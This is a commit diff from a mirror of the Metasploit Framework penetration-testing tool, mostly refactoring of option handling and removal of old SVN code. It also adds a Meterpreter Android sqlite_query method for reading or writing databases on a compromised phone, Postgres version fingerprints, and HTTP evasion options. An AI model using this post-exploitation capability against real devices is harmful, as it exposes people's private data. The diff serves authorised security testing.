github/metasploit-framework
1
Fork 0
mirror of https://github.com/rapid7/metasploit-framework synced 2024-11-12 11:52:01 +01:00
Code Releases Activity

Merge branch 'master' into land-6691-

Browse Source
This commit is contained in:
Brent Cook 2016-03-24 22:19:57 -05:00
commit 242ea8d9cd
131 changed files with 1265 additions and 857 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
.mailmap
View File

@ -114,6 +114,7 @@ m-1-k-3 <m-1-k-3@github> Michael Messner <devnull@s3cur1ty.de>
Meatballs1 <Meatballs1@github> <eat_meatballs@hotmail.co.uk>
Meatballs1 <Meatballs1@github> <Meatballs1@users.noreply.github.com>
mubix <mubix@github> Rob Fuller <jd.mubix@gmail.com>
net-ninja <net-ninja@github.com> Steven Seeley <steventhomasseeley@gmail.com>
nevdull77 <nevdull77@github> Patrik Karlsson <patrik@cqure.net>
nmonkee <nmonkee@github> nmonkee <dave@northern-monkee.co.uk>
nullbind <nullbind@github> nullbind <scott.sutherland@nullbind.com>

6
Gemfile.lock
View File

@ -1,7 +1,7 @@
PATH
remote: .
specs:
metasploit-framework (4.11.16)
metasploit-framework (4.11.18)
actionpack (>= 4.0.9, < 4.1.0)
activerecord (>= 4.0.9, < 4.1.0)
activesupport (>= 4.0.9, < 4.1.0)
@ -13,7 +13,7 @@ PATH
metasploit-concern
metasploit-credential (= 1.1.0)
metasploit-model (= 1.1.0)
metasploit-payloads (= 1.1.2)
metasploit-payloads (= 1.1.3)
metasploit_data_models (= 1.3.0)
msgpack
network_interface (~> 0.0.1)
@ -124,7 +124,7 @@ GEM
activemodel (>= 4.0.9, < 4.1.0)
activesupport (>= 4.0.9, < 4.1.0)
railties (>= 4.0.9, < 4.1.0)
metasploit-payloads (1.1.2)
metasploit-payloads (1.1.3)
metasploit_data_models (1.3.0)
activerecord (>= 4.0.9, < 4.1.0)
activesupport (>= 4.0.9, < 4.1.0)

BIN
data/exploits/R7_2015_17/stream.raw Normal file
View File

Binary file not shown.

2
lib/metasploit/framework/version.rb
View File

@ -30,7 +30,7 @@ module Metasploit
end
end
VERSION = "4.11.16"
VERSION = "4.11.18"
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
PRERELEASE = 'dev'
HASH = get_hash

2
lib/msf/base/config.rb
View File

@ -27,7 +27,7 @@ class Config < Hash
# @return [String] the base configuration directory
def self.get_config_root
# Use MSFCFGDIR environment variable first. See feature request #5797
# Use MSF_CFGROOT_CONFIG environment variable first.
val = Rex::Compat.getenv('MSF_CFGROOT_CONFIG')
if (val and File.directory?(val))
return val

2
lib/msf/base/sessions/command_shell.rb
View File

@ -216,7 +216,7 @@ class CommandShell
end
end
if (datastore['InitialAutoRunScript'] && datastore['InitialAutoRunScript'].empty? == false)
if datastore['InitialAutoRunScript'] && !datastore['InitialAutoRunScript'].empty?
args = Shellwords.shellwords( datastore['InitialAutoRunScript'] )
print_status("Session ID #{sid} (#{tunnel_to_s}) processing InitialAutoRunScript '#{datastore['InitialAutoRunScript']}'")
execute_script(args.shift, *args)

8
lib/msf/base/sessions/meterpreter_options.rb
View File

@ -37,13 +37,13 @@ module MeterpreterOptions
framework.sessions.schedule Proc.new {
# Configure unicode encoding before loading stdapi
session.encode_unicode = ( datastore['EnableUnicodeEncoding'] ? true : false )
session.encode_unicode = datastore['EnableUnicodeEncoding']
session.init_ui(self.user_input, self.user_output)
valid = true
if datastore['AutoVerifySession'] == true
if datastore['AutoVerifySession']
if not session.is_valid_session?(datastore['AutoVerifySessionTimeout'].to_i)
print_error("Meterpreter session #{session.sid} is not valid and will be closed")
valid = false
@ -52,7 +52,7 @@ module MeterpreterOptions
if valid
if datastore['AutoLoadStdapi'] == true
if datastore['AutoLoadStdapi']
session.load_stdapi
@ -72,7 +72,7 @@ module MeterpreterOptions
end
[ 'InitialAutoRunScript', 'AutoRunScript' ].each do |key|
if (datastore[key].empty? == false)
if !datastore[key].empty?
args = Shellwords.shellwords( datastore[key] )
print_status("Session ID #{session.sid} (#{session.tunnel_to_s}) processing #{key} '#{datastore[key]}'")
session.execute_script(args.shift, *args)

2
lib/msf/base/sessions/vncinject_options.rb
View File

@ -84,7 +84,7 @@ module VncInjectOptions
print_status("Local TCP relay started.")
# If the AUTOVNC flag is set, launch VNC viewer.
if (datastore['AUTOVNC'] == true)
if datastore['AUTOVNC']
if (session.autovnc(datastore['ViewOnly']))
print_status("Launched vncviewer.")
else

2
lib/msf/core/auxiliary/crawler.rb
View File

@ -44,7 +44,7 @@ module Auxiliary::HttpCrawler
OptString.new('BasicAuthPass', [false, 'The HTTP password to specify for basic authentication']),
OptString.new('HTTPAdditionalHeaders', [false, "A list of additional headers to send (separated by \\x01)"]),
OptString.new('HTTPCookie', [false, "A HTTP cookie header to send with each request"]),
OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'Auto', ['Auto', 'SSL2', 'SSL23', 'SSL3', 'TLS1']]),
Opt::SSLVersion
], self.class
)

28
lib/msf/core/data_store.rb
View File

@ -13,6 +13,7 @@ class DataStore < Hash
# Initializes the data store's internal state.
#
def initialize()
@options = Hash.new
@imported = Hash.new
@imported_by = Hash.new
end
@ -26,6 +27,14 @@ class DataStore < Hash
@imported[k] = false
@imported_by[k] = nil
opt = @options[k]
unless opt.nil?
unless opt.valid?(v)
raise OptionValidateError.new(["Value '#{v}' is not valid for option '#{k}'#{['', ', try harder'].sample}"])
end
v = opt.normalize(v)
end
super(k,v)
end
@ -65,17 +74,11 @@ class DataStore < Hash
# all of the supplied options
#
def import_options(options, imported_by = nil, overwrite = false)
options.each_option { |name, opt|
# If there's already a value defined for this option, then skip it
# and don't import it.
next if self.has_key?(name) and overwrite == false
# If the option has a default value, import it, but only if the
# datastore doesn't already have a value set for it.
if ((opt.default != nil) and (overwrite or self[name] == nil))
import_option(name, opt.default.to_s, true, imported_by)
options.each_option do |name, opt|
if self[name].nil? || overwrite
import_option(name, opt.default, true, imported_by, opt)
end
}
end
end
#
@ -124,13 +127,14 @@ class DataStore < Hash
#
def import_options_from_hash(option_hash, imported = true, imported_by = nil)
option_hash.each_pair { |key, val|
import_option(key, val.to_s, imported, imported_by)
import_option(key, val, imported, imported_by)
}
end
def import_option(key, val, imported=true, imported_by=nil)
def import_option(key, val, imported=true, imported_by=nil, option=nil)
self.store(key, val)
@options[key] = option
@imported[key] = imported
@imported_by[key] = imported_by
end

10
lib/msf/core/db_manager.rb
View File

@ -163,14 +163,4 @@ class Msf::DBManager
true
end
# Mainly, it's Ruby 1.9.1 that cause a lot of problems now, along with Ruby 1.8.6.
# Ruby 1.8.7 actually seems okay, but why tempt fate? Let's say 1.9.3 and beyond.
def warn_about_rubies
if ::RUBY_VERSION =~ /^1\.9\.[012]($|[^\d])/
$stderr.puts "**************************************************************************************"
$stderr.puts "Metasploit requires at least Ruby 1.9.3. For an easy upgrade path, see https://rvm.io/"
$stderr.puts "**************************************************************************************"
end
end
end

2
lib/msf/core/encoder.rb
View File

@ -537,7 +537,7 @@ protected
#
def find_context_key(buf, badchars, state)
# Make sure our context information file is sane
if File.exists?(datastore['ContextInformationFile']) == false
if !File.exists?(datastore['ContextInformationFile'])
raise NoKeyError, "A context information file must specified when using context encoding", caller
end

2
lib/msf/core/exploit.rb
View File

@ -1506,7 +1506,7 @@ protected
# required when wanting to support context keyed encoding
#
def define_context_encoding_reqs(reqs)
return if datastore['EnableContextEncoding'] != true
return unless datastore['EnableContextEncoding']
# At present, we don't support any automatic methods of obtaining
# context information. In the future, we might support obtaining

4
lib/msf/core/exploit/http/client.rb
View File

@ -50,7 +50,7 @@ module Exploit::Remote::HttpClient
OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', '']),
OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']),
OptBool.new('DigestAuthIIS', [false, 'Conform to IIS, should work for most servers. Only set to false for non-IIS servers', true]),
OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'Auto', ['Auto', 'SSL2', 'SSL3', 'TLS1']]),
Opt::SSLVersion,
OptBool.new('FingerprintCheck', [ false, 'Conduct a pre-exploit fingerprint verification', true]),
OptString.new('DOMAIN', [ true, 'The domain to use for windows authentification', 'WORKSTATION']),
OptInt.new('HttpClientTimeout', [false, 'HTTP connection and receive timeout'])
@ -85,7 +85,7 @@ module Exploit::Remote::HttpClient
#
# Remaining evasions to implement
#
# OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP request via "Transfer-Encoding: chunked"', 'false']),
# OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP request via "Transfer-Encoding: chunked"', false]),
# OptInt.new('HTTP::junk_pipeline', [true, 'Insert the specified number of junk pipeline requests', 0]),
], self.class
)

14
lib/msf/core/exploit/http/server.rb
View File

@ -32,9 +32,9 @@ module Exploit::Remote::HttpServer
register_evasion_options(
[
OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP responses via "Transfer-Encoding: chunked"', 'false']),
OptBool.new('HTTP::header_folding', [false, 'Enable folding of HTTP headers', 'false']),
OptBool.new('HTTP::junk_headers', [false, 'Enable insertion of random junk HTTP headers', 'false']),
OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP responses via "Transfer-Encoding: chunked"', false]),
OptBool.new('HTTP::header_folding', [false, 'Enable folding of HTTP headers', false]),
OptBool.new('HTTP::junk_headers', [false, 'Enable insertion of random junk HTTP headers', false]),
OptEnum.new('HTTP::compression', [false, 'Enable compression of HTTP responses via content encoding', 'none', ['none','gzip','deflate']]),
OptString.new('HTTP::server_name', [true, 'Configures the Server header of all outgoing replies', 'Apache'])
], Exploit::Remote::HttpServer
@ -86,7 +86,7 @@ module Exploit::Remote::HttpServer
# set.
#
def use_zlib
if (!Rex::Text.zlib_present? and datastore['HTTP::compression'] == true)
if !Rex::Text.zlib_present? && datastore['HTTP::compression']
raise RuntimeError, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!"
end
end
@ -530,16 +530,16 @@ module Exploit::Remote::HttpServer
response.compress = datastore['HTTP::compression']
end
if (datastore['HTTP::chunked'] == true)
if datastore['HTTP::chunked']
response.auto_cl = false
response.transfer_chunked = true
end
if (datastore['HTTP::header_folding'] == true)
if datastore['HTTP::header_folding']
response.headers.fold = 1
end
if (datastore['HTTP::junk_headers'] == true)
if datastore['HTTP::junk_headers']
response.headers.junk_headers = 1
end

2
lib/msf/core/exploit/postgres.rb
View File

@ -292,6 +292,8 @@ module Exploit::Remote::Postgres
when "Fauth.c:L302:Rauth_failed" ; return {:preauth => "9.1.6"} # Bad password, good database
when "Fpostinit.c:L718:RInitPostgres" ; return {:preauth => "9.1.6"} # Good creds, non-existent but allowed database
when "Fauth.c:L483:RClientAuthentication" ; return {:preauth => "9.1.6"} # Bad user
when "Fauth.c:L285:Rauth_failed" ; return {:preauth => "9.4.1-5"} # Bad creds, good database
when "Fauth.c:L481:RClientAuthentication" ; return {:preauth => "9.4.1-5"} # bad user or host
# Windows

2
lib/msf/core/exploit/remote/browser_exploit_server.rb
View File

@ -588,7 +588,7 @@ module Msf
if profile.nil?
print_status("Browsing directly to the exploit URL is forbidden.")
send_not_found(cli)
elsif profile[:tried] and datastore['Retries'] == false
elsif profile[:tried] && !datastore['Retries']
print_status("Target with tag \"#{tag}\" wants to retry the module, not allowed.")
send_not_found(cli)
else

2
lib/msf/core/exploit/smb/client.rb
View File

@ -64,7 +64,7 @@ module Msf
register_options(
[
Opt::RHOST,
OptInt.new('RPORT', [ true, 'Set the SMB service port', 445])
OptPort.new('RPORT', [ true, 'The SMB service port', 445])
], Msf::Exploit::Remote::SMB::Client)
register_autofilter_ports([ 139, 445])

4
lib/msf/core/exploit/sunrpc.rb
View File

@ -31,7 +31,7 @@ module Exploit::Remote::SunRPC
register_evasion_options(
[
OptBool.new('ONCRPC::tcp_request_fragmentation', [false, 'Enable fragmentation of TCP ONC/RPC requests', 'false']),
OptBool.new('ONCRPC::tcp_request_fragmentation', [false, 'Enable fragmentation of TCP ONC/RPC requests', false]),
], Msf::Exploit::Remote::SunRPC
)
@ -65,7 +65,7 @@ module Exploit::Remote::SunRPC
}
)
if datastore['ONCRPC::tcp_request_fragmentation'] == true
if datastore['ONCRPC::tcp_request_fragmentation']
self.rpcobj.should_fragment = 1
end

2
lib/msf/core/exploit/tcp.rb
View File

@ -64,7 +64,7 @@ module Exploit::Remote::Tcp
register_advanced_options(
[
OptBool.new('SSL', [ false, 'Negotiate SSL/TLS for outgoing connections', false]),
OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL/TLS to be used (TLS and SSL23 are auto-negotiate)', 'TLS1', ['SSL2', 'SSL3', 'SSL23', 'TLS', 'TLS1', 'TLS1.1', 'TLS1.2']]),
Opt::SSLVersion,
OptEnum.new('SSLVerifyMode', [ false, 'SSL verification method', 'PEER', %W{CLIENT_ONCE FAIL_IF_NO_PEER_CERT NONE PEER}]),
OptString.new('SSLCipher', [ false, 'String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"']),
Opt::Proxies,

1
lib/msf/core/exploit/tcp_server.rb
View File

@ -19,7 +19,6 @@ module Exploit::Remote::TcpServer
[
OptBool.new('SSL', [ false, 'Negotiate SSL for incoming connections', false]),
# SSLVersion is currently unsupported for TCP servers (only supported by clients at the moment)
# OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'TLS1', ['SSL2', 'SSL3', 'TLS1']]),
OptPath.new('SSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)']),
OptAddress.new('SRVHOST', [ true, "The local host to listen on. This must be an address on the local machine or 0.0.0.0", '0.0.0.0' ]),
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8080 ]),

8
lib/msf/core/framework.rb
View File

@ -38,14 +38,6 @@ class Framework
Revision = "$Revision$"
# Repository information
RepoRevision = ::Msf::Util::SVN.revision
RepoUpdated = ::Msf::Util::SVN.updated
RepoUpdatedDays = ::Msf::Util::SVN.days_since_update
RepoUpdatedDaysNote = ::Msf::Util::SVN.last_updated_friendly
RepoUpdatedDate = ::Msf::Util::SVN.last_updated_date
RepoRoot = ::Msf::Util::SVN.root
# EICAR canary
EICARCorrupted = ::Msf::Util::EXE.is_eicar_corrupted?

5
lib/msf/core/module.rb
View File

@ -266,11 +266,10 @@ class Module
end
#
# Returns true if this module is being debugged. The debug flag is set
# by setting datastore['DEBUG'] to 1|true|yes
# Returns true if this module is being debugged.
#
def debugging?
(datastore['DEBUG'] || '') =~ /^(1|t|y)/i
datastore['DEBUG']
end
#

10
lib/msf/core/module/deprecated.rb
View File

@ -60,15 +60,15 @@ module Msf::Module::Deprecated
#
# @return [void]
def print_deprecation_warning
print_warning("*"*72)
print_warning("*%red"+"The module #{refname} is deprecated!".center(70)+"%clr*")
print_warning("*"*90)
print_warning("*%red"+"The module #{refname} is deprecated!".center(88)+"%clr*")
if deprecation_date
print_warning("*"+"It will be removed on or about #{deprecation_date}".center(70)+"*")
print_warning("*"+"It will be removed on or about #{deprecation_date}".center(88)+"*")
end
if replacement_module
print_warning("*"+"Use #{replacement_module} instead".center(70)+"*")
print_warning("*"+"Use #{replacement_module} instead".center(88)+"*")
end
print_warning("*"*72)
print_warning("*"*90)
end
def init_ui(input = nil, output = nil)

5
lib/msf/core/module/ui/message.rb
View File

@ -14,9 +14,8 @@ module Msf::Module::UI::Message
def print_prefix
prefix = ''
if (datastore['TimestampOutput'] =~ /^(t|y|1)/i) || (
framework && framework.datastore['TimestampOutput'] =~ /^(t|y|1)/i
)
if datastore['TimestampOutput'] ||
(framework && framework.datastore['TimestampOutput'])
prefix << "[#{Time.now.strftime("%Y.%m.%d-%H:%M:%S")}] "
xn ||= datastore['ExploitNumber']

8
lib/msf/core/module/ui/message/verbose.rb
View File

@ -1,21 +1,21 @@
module Msf::Module::UI::Message::Verbose
# Verbose version of #print_error
def vprint_error(msg='')
print_error(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE']
print_error(msg) if datastore['VERBOSE'] || (!framework.nil? && framework.datastore['VERBOSE'])
end
# Verbose version of #print_good
def vprint_good(msg='')
print_good(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE']
print_good(msg) if datastore['VERBOSE'] || (!framework.nil? && framework.datastore['VERBOSE'])
end
# Verbose version of #print_status
def vprint_status(msg='')
print_status(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE']
print_status(msg) if datastore['VERBOSE'] || (!framework.nil? && framework.datastore['VERBOSE'])
end
# Verbose version of #print_warning
def vprint_warning(msg='')
print_warning(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE']
print_warning(msg) if datastore['VERBOSE'] || (!framework.nil? && framework.datastore['VERBOSE'])
end
end

5
lib/msf/core/module_manager.rb
View File

@ -147,11 +147,6 @@ module Msf
# @param klass [Class<Msf::Module>] The module class
# @return [void]
def auto_subscribe_module(klass)
# If auto-subscribe has been disabled
if (framework.datastore['DisableAutoSubscribe'] and
framework.datastore['DisableAutoSubscribe'] =~ /^(y|1|t)/)
return
end
# If auto-subscription is enabled (which it is by default), figure out
# if it subscribes to any particular interfaces.

4
lib/msf/core/modules/loader/directory.rb
View File

@ -32,10 +32,6 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base
def each_module_reference_name(path, opts={})
whitelist = opts[:whitelist] || []
::Dir.foreach(path) do |entry|
if entry.downcase == '.svn'
next
end
full_entry_path = ::File.join(path, entry)
type = entry.singularize

8
lib/msf/core/opt.rb
View File

@ -51,6 +51,13 @@ module Msf
Msf::OptPort.new(__method__.to_s, [ required, desc, default ])
end
# @return [OptEnum]
def self.SSLVersion
Msf::OptEnum.new('SSLVersion', [ false,
'Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate)', 'Auto',
['Auto', 'SSL2', 'SSL3', 'SSL23', 'TLS', 'TLS1', 'TLS1.1', 'TLS1.2']])
end
# These are unused but remain for historical reasons
class << self
alias builtin_chost CHOST
@ -69,6 +76,7 @@ module Msf
Proxies = Proxies()
RHOST = RHOST()
RPORT = RPORT()
SSLVersion = SSLVersion()
end
end

17
lib/msf/core/opt_port.rb
View File

@ -7,24 +7,17 @@ module Msf
# Network port option.
#
###
class OptPort < OptBase
class OptPort < OptInt
def type
return 'port'
end
def normalize(value)
value.to_i
end
def valid?(value)
return false if empty_required_value?(value)
if ((value != nil and value.to_s.empty? == false) and
((value.to_s.match(/^\d+$/) == nil or value.to_i < 0 or value.to_i > 65535)))
return false
if !required? and value.to_s.empty?
super
else
super && normalize(value) <= 65535 && normalize(value) >= 0
end
return super
end
end

2
lib/msf/core/opt_raw.rb
View File

@ -13,7 +13,7 @@ class OptRaw < OptBase
end
def normalize(value)
if (value =~ /^file:(.*)/)
if (value.to_s =~ /^file:(.*)/)
path = $1
begin
value = File.read(path)

2
lib/msf/core/opt_regexp.rb
View File

@ -29,7 +29,7 @@ class OptRegexp < OptBase
def normalize(value)
return nil if value.nil?
return Regexp.compile(value)
return Regexp.compile(value.to_s)
end
def display_value(value)

2
lib/msf/core/opt_string.rb
View File

@ -13,7 +13,7 @@ class OptString < OptBase
end
def normalize(value)
if (value =~ /^file:(.*)/)
if (value.to_s =~ /^file:(.*)/)
path = $1
begin
value = File.read(path)

2
lib/msf/core/payload/ruby.rb
View File

@ -10,7 +10,7 @@ module Msf::Payload::Ruby
[
# Since space restrictions aren't really a problem, default this to
# true.
Msf::OptBool.new('PrependFork', [ false, "Start the payload in its own process via fork or popen", "true" ])
Msf::OptBool.new('PrependFork', [ false, "Start the payload in its own process via fork or popen", true ])
]
)
end

2
lib/msf/core/payload/windows/prepend_migrate.rb
View File

@ -28,7 +28,7 @@ module Msf::Payload::Windows::PrependMigrate
# for discussion.
#
def prepend_migrate?
!!(datastore['PrependMigrate'] && datastore['PrependMigrate'].to_s.downcase == 'true')
datastore['PrependMigrate']
end
#

83
lib/msf/sanity.rb
View File

@ -3,36 +3,6 @@
# Provides some sanity checks against the ruby build and version
#
# Check for the broken pack/unpack in OS X 10.4.x
if ([1].pack('n') == "\x01\x00")
$stderr.puts "*** This ruby build has a broken pack/unpack implementation! "
if (RUBY_PLATFORM =~ /darwin/)
$stderr.puts " Apple shipped a broken version of ruby with the 10.4.x "
$stderr.puts " release. Please install ruby from source, or use one of "
$stderr.puts " the free package managers to obtain a working ruby build."
end
exit(0)
end
# Check for ruby 1.8.2 as the minimal supported version
if (RUBY_VERSION =~ /^1\.[0-7]\./ or RUBY_VERSION =~ /^1\.8\.[0-1]$/)
$stderr.puts "*** This version of ruby is not supported, please upgrade to 1.8.7+"
exit(0)
end
# Check for ruby 1.9.0 and throw a big nasty warning
if (RUBY_VERSION =~ /^1\.9\.0/)
$stderr.puts "*** Ruby 1.9.0 is not supported, please upgrade to Ruby 1.9.3 or newer."
exit(0)
end
# Check for ruby 1.9.1 and throw a warning
if (RUBY_VERSION =~ /^1\.9\.1/)
$stderr.puts "*** Ruby 1.9.1 is not supported, please upgrade to Ruby 1.9.3 or newer."
end
if(RUBY_PLATFORM == 'java')
require 'socket'
s = Socket.new(::Socket::AF_INET, ::Socket::SOCK_STREAM, ::Socket::IPPROTO_TCP)
@ -56,56 +26,3 @@ rescue ::LoadError
$stderr.puts "*** The ruby-openssl library is not installed, many features will be disabled!"
$stderr.puts "*** Examples: Meterpreter, SSL Sockets, SMB/NTLM Authentication, and more"
end
#
# Check for the ugly 1.8.7 short-named constants bug
#
class ConstBugTestA
Const = 'A'
def test
Const == 'A'
end
end
ConstBugTestC = ConstBugTestA.dup
class ConstBugTestB < ConstBugTestC
Const = 'B'
end
def ruby_187_const_bug
bugged = false
begin
ConstBugTestA.new.test()
ConstBugTestB.new.test()
rescue ::NameError
bugged = true
end
bugged
end
if(ruby_187_const_bug())
$stderr.puts ""
$stderr.puts "***********************************************************************"
$stderr.puts "*** *"
$stderr.puts "*** This version of the Ruby interpreter contains a serious bug *"
$stderr.puts "*** related to short-named constants, we strongly recommend that you *"
$stderr.puts "*** switch to a fixed version. Unfortunately, some Linux distros have *"
$stderr.puts "*** backported the buggy patch into 1.8.6, so you may need to contact *"
$stderr.puts "*** your vendor and ask them to review the URL below. *"
$stderr.puts "*** *"
$stderr.puts "*** Alternatively, you can download, build, and install the latest *"
$stderr.puts "*** stable snapshot of Ruby from the following URL: *"
$stderr.puts "*** - http://www.ruby-lang.org/ *"
$stderr.puts "*** *"
$stderr.puts "*** For more information, please see the following URL: *"
$stderr.puts "*** - https://bugs.launchpad.net/bugs/282302 *"
$stderr.puts "*** *"
$stderr.puts "***********************************************************************"
$stderr.puts ""
end

30
lib/msf/ui/console/command_dispatcher/core.rb
View File

@ -2178,10 +2178,15 @@ class Core
return true
end
if append
datastore[name] = datastore[name] + value
else
datastore[name] = value
begin
if append
datastore[name] = datastore[name] + value
else
datastore[name] = value
end
rescue OptionValidateError => e
print_error(e.message)
elog(e.message)
end
print_line("#{name} => #{datastore[name]}")
@ -2193,7 +2198,6 @@ class Core
# @param str [String] the string currently being typed before tab was hit
# @param words [Array<String>] the previously completed words on the command line. words is always
# at least 1 when tab completion has reached this stage since the command itself has been completed
def cmd_set_tabs(str, words)
# A value has already been specified
@ -2837,16 +2841,8 @@ class Core
# Returns the revision of the framework and console library
#
def cmd_version(*args)
svn_console_version = "$Revision: 15168 $"
svn_metasploit_version = Msf::Framework::Revision.match(/ (.+?) \$/)[1] rescue nil
if svn_metasploit_version
print_line("Framework: #{Msf::Framework::Version}.#{svn_metasploit_version}")
else
print_line("Framework: #{Msf::Framework::Version}")
end
print_line("Console : #{Msf::Framework::Version}.#{svn_console_version.match(/ (.+?) \$/)[1]}")
return true
print_line("Framework: #{Msf::Framework::Version}")
print_line("Console : #{Msf::Framework::Version}")
end
def cmd_grep_help
@ -3523,7 +3519,7 @@ class Core
next if not o
# handle a search string, search deep
if(
if (
not regex or
o.name.match(regex) or
o.description.match(regex) or
@ -3537,7 +3533,7 @@ class Core
mod_opt_keys = o.options.keys.map { |x| x.downcase }
opts.each do |opt,val|
if mod_opt_keys.include?(opt.downcase) == false or (val != nil and o.datastore[opt] != val)
if !mod_opt_keys.include?(opt.downcase) || (val != nil && o.datastore[opt] != val)
show = false
end
end

3
lib/msf/ui/console/command_dispatcher/exploit.rb
View File

@ -154,8 +154,7 @@ class Exploit
else
# If we didn't run a payload handler for this exploit it doesn't
# make sense to complain to the user that we didn't get a session
disable_handler = /^true$/i === mod.datastore["DisablePayloadHandler"] ? true : false
unless disable_handler
unless mod.datastore["DisablePayloadHandler"]
fail_msg = 'Exploit completed, but no session was created.'
print_status(fail_msg)
begin

8
lib/msf/ui/console/driver.rb
View File

@ -139,13 +139,13 @@ class Driver < Msf::Ui::Driver
self.disable_output = false
# Whether or not command passthru should be allowed
self.command_passthru = (opts['AllowCommandPassthru'] == false) ? false : true
self.command_passthru = opts.fetch('AllowCommandPassthru', true)
# Whether or not to confirm before exiting
self.confirm_exit = (opts['ConfirmExit'] == true) ? true : false
self.confirm_exit = opts['ConfirmExit']
# Disables "dangerous" functionality of the console
@defanged = opts['Defanged'] == true
@defanged = opts['Defanged']
# If we're defanged, then command passthru should be disabled
if @defanged
@ -659,7 +659,7 @@ protected
def unknown_command(method, line)
[method, method+".exe"].each do |cmd|
if (command_passthru == true and Rex::FileUtils.find_full_path(cmd))
if command_passthru && Rex::FileUtils.find_full_path(cmd)
print_status("exec: #{line}")
print_line('')

4
lib/msf/util.rb
View File

@ -21,7 +21,3 @@ end
# Executable generation and encoding
require 'msf/util/exe'
# Parse SVN entries
require 'msf/util/svn'

120
lib/msf/util/svn.rb
View File

@ -1,120 +0,0 @@
# -*- coding: binary -*-
###
#
# framework-util-svn
# --------------
#
# The class provides methods for parsing the SVN information in the framework directory
#
###
require 'date'
module Msf
module Util
class SVN
def self.load_root
info = {}
path = ::File.join(::File.dirname(__FILE__), "..", "..", "..", ".svn", "entries")
if !::File.exists?(path)
return info
end
contents = ''
File.open(path, "rb") do |fd|
contents = fd.read(::File.size(path))
end
if contents.include? "<?xml"
require 'rexml/document'
rd = REXML::Document.new(contents).root
rd.elements.each { |e|
if e.attributes['name'] == ""
info[:root] = e.attributes['url']
info[:revision] = e.attributes['revision']
info[:updated] = e.attributes['committed-date']
break
end
}
else
ents = contents.split("\x0c")
ents[0].split("\n").each do |line|
line.strip!
next if line.empty?
case line
when /framework3/
info[:root] = line
when /^\d+$/
info[:revision] = line.to_i
when /^\d{4}-\d.*T/
info[:updated] = line
end
break if (info[:root] and info[:revision] and info[:updated])
end
end
info
end
def self.revision
@@info ||= load_root
@@info[:revision]
end
def self.updated
@@info ||= load_root
@@info[:updated]
end
def self.root
@@info ||= load_root
@@info[:root]
end
def self.days_since_update
@@info ||= load_root
svnt = @@info[:updated]
if(not svnt)
return
end
# Date.parse and Date.strptime are both broken beyond repair in
# ruby 1.8.6 and older. Just bail if the parsing doesn't work.
begin
diff = (Date.parse(Time.now.to_s) - Date.parse(svnt)).to_f
rescue ArgumentError
end
end
def self.last_updated_friendly
diff = self.days_since_update
case diff
when nil
"at an unknown date"
when -2.0 .. 1.0
"today"
when 1.0 .. 2.0
"yesterday"
else
if (diff.to_i > 7)
"%red#{diff.to_i} days ago%clr"
else
"#{diff.to_i} days ago"
end
end
end
def self.last_updated_date
@@info ||= load_root
svnt = @@info[:updated]
if(not svnt)
return
end
begin
Date.parse(@@info[:updated])
rescue ArgumentError
end
end
end
end
end

27
lib/rex/post/meterpreter/extensions/android/android.rb
View File

@ -295,6 +295,33 @@ class Android < Extension
end
networks
end
def sqlite_query(dbname, query, writeable)
request = Packet.create_request('sqlite_query')
request.add_tlv(TLV_TYPE_SQLITE_NAME, dbname)
request.add_tlv(TLV_TYPE_SQLITE_QUERY, query)
request.add_tlv(TLV_TYPE_SQLITE_WRITE, writeable)
response = client.send_request(request, 30)
error_msg = response.get_tlv(TLV_TYPE_SQLITE_ERROR)
raise "SQLiteException: #{error_msg.value}" if error_msg
unless writeable
result = {
columns: [],
rows: []
}
data = response.get_tlv(TLV_TYPE_SQLITE_RESULT_GROUP)
unless data.nil?
columns = data.get_tlv(TLV_TYPE_SQLITE_RESULT_COLS)
result[:columns] = columns.get_tlv_values(TLV_TYPE_SQLITE_VALUE)
data.each(TLV_TYPE_SQLITE_RESULT_ROW) do |row|
result[:rows] << row.get_tlv_values(TLV_TYPE_SQLITE_VALUE)
end
end
result
end
end
end
end
end

9
lib/rex/post/meterpreter/extensions/android/tlv.rb
View File

@ -81,6 +81,15 @@ TLV_TYPE_URI_STRING = TLV_META_TYPE_STRING | (TLV_EXTENSIONS
TLV_TYPE_ACTIVITY_START_RESULT = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9102)
TLV_TYPE_ACTIVITY_START_ERROR = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9103)
TLV_TYPE_SQLITE_RESULT_GROUP = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9080)
TLV_TYPE_SQLITE_NAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9081)
TLV_TYPE_SQLITE_QUERY = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9082)
TLV_TYPE_SQLITE_RESULT_COLS = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9083)
TLV_TYPE_SQLITE_RESULT_ROW = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9084)
TLV_TYPE_SQLITE_VALUE = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9085)
TLV_TYPE_SQLITE_ERROR = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9086)
TLV_TYPE_SQLITE_WRITE = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9087)
